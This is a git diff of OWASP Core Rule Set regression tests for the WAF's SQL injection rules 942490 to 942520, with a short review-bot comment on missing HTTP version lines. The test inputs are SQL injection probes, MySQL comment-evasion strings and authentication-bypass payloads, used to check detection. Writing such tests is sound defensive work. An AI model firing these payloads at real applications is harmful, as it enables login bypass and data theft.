@@ -1,380 +1,380 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942490.yaml - tests: - - - test_title: 942490-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942490.yaml +tests: + - test_title: 942490-1 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-2 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-3 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-4 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-5 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-6 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x222562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-7 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22:[\x2200" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-8 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-9 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-10 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-11 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-12 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22:\x2265" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-13 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-14 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-15 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-16 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-17 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22>%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-18 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-19 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-20 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-20 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:\x22[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-21 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-21 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-22 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-22 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22;}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 558e49d32b..7b18c9e1c4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml 
@@ -1,23 +1,85 @@ --- - meta: - author: "Franziska Buehler" - description: None - enabled: true - name: 942500.yaml - tests: - - - test_title: 942500-1 - desc: "MySQL in-line comment detection" +meta: + author: "Franziska Buehler, Max Leske" + description: "Detection of MySQL injection evasion attempts using special comments" + enabled: true + name: 942500.yaml +tests: + - test_title: 942500-1 + desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-2 + desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" 
+ stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-3 + desc: "Use of optimizer hints (/*+...*/) as evasion technique" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + output: + log_contains: id "942500" + - test_title: 942500-4 + desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + output: + log_contains: id "942500" + - test_title: 942500-5 + desc: "Status Page Test - MySQL inline comment detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index 13bd384596..a57e20af68 100644 
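Review bot: Tests 942500-3 and 942500-4 omit the `version: HTTP/1.0` line that every other stage in this file (and in the neighbouring 942490/942520 files) carries after `uri:`, so these two requests will be sent with whatever default the test runner picks rather than the HTTP/1.0 the rest of the suite pins. Add `          version: HTTP/1.0` under the `uri:` line of both stages so the optimizer-hint cases are exercised under the same request shape as the portability-comment cases. The same two tests also use a `/get?test=` path while the others use `/?id=`/`/?test=`; harmless, but worth aligning if there is no reason for the difference.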
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -12,8 +12,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?`bla`" @@ -27,8 +28,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?'bla'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 0712bb944f..797947b690 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -12,8 +12,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?`bla`" @@ -27,8 +28,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?'bla'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml new file mode 100644 index 0000000000..ce2aa97f31 --- /dev/null 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml 
@@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.0/4" + enabled: true + name: 942520.yaml +tests: + - test_title: 942520-1 + desc: "Detects basic SQL auth bypass with 'is not something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-2 + desc: "Negative test: 'is notes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-3 + desc: "Detects basic SQL auth bypass with 'not like something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-4 + desc: "Detects basic SQL auth bypass with 'not glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-5 + desc: "Detects basic SQL auth bypass with 'not like glob'" + stages: + - stage: + 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-6 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-7 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-8 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-9 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-10 + desc: "Nagive test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-11 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-12 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-14 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + 
log_contains: id "942520" + - test_title: 942520-15 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-16 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-17 + desc: "Negative test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-18 + desc: "Detects basic SQL auth bypass with mod" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-19 + desc: "Detects basic SQL auth bypass with: sounds like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-20 + desc: "Bypass with a comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-21 + desc: "Integration test: 942521 blocks foo'or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942520-22 + desc: "Integration test: 942522 blocks foo\\''or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942520-23 + desc: "Detect auth bypass email=' is not?--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log_contains: id "942520" 
